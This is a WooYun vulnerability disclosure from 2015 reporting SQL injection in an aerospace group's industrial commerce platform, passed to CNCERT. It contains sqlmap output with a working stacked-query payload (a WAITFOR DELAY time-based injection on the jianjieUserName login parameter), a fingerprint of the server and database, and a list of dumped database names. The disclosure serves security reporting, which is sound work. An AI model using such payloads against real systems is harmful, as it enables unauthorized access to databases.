WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0138099

漏洞标题：中航天某工业网系统存在SQL注入可泄漏数据信息

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-09-03 22:55

修复时间：2015-10-21 14:18

公开时间：2015-10-21 14:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2015-09-03： 细节已通知厂商并且等待厂商处理中
2015-09-06： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-09-16： 细节向核心白帽子及相关领域专家公开
2015-09-26： 细节向普通白帽子公开
2015-10-06： 细节向实习白帽子公开
2015-10-21： 细节向公众公开

简要描述：

中国航天科工是中央直接管理的国有特大型高科技企业，前身为1956年10月成立的国防部第五研究院，先后经历了第七机械工业部(1981年9月第八机械工业部并入）、航天工业部、航空航天工业部、中国航天工业总公司的历史沿革。1999年7月成立中国航天机电集团公司，2001年7月更名为中国航天科工集团公司。
中国航天科工集团紧紧围绕'互联网+'和'一路一带'发展规划，在新业态经济环境中，与浪潮集团联合推出航天工业网综合服务云商务平台。

详细说明：

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: jianjieUserName (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: remember=0&returnurl=http://**.**.**.**/htlogin.aspx&jianjieUserName=admin');
WAITFOR DELAY '0:0:5'--&jianjiePassWord=admin
---
[10:09:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

漏洞证明：

available databases [9]:
[*] BaogaoDB
[*] JianjieDB
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] YoucanDB

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应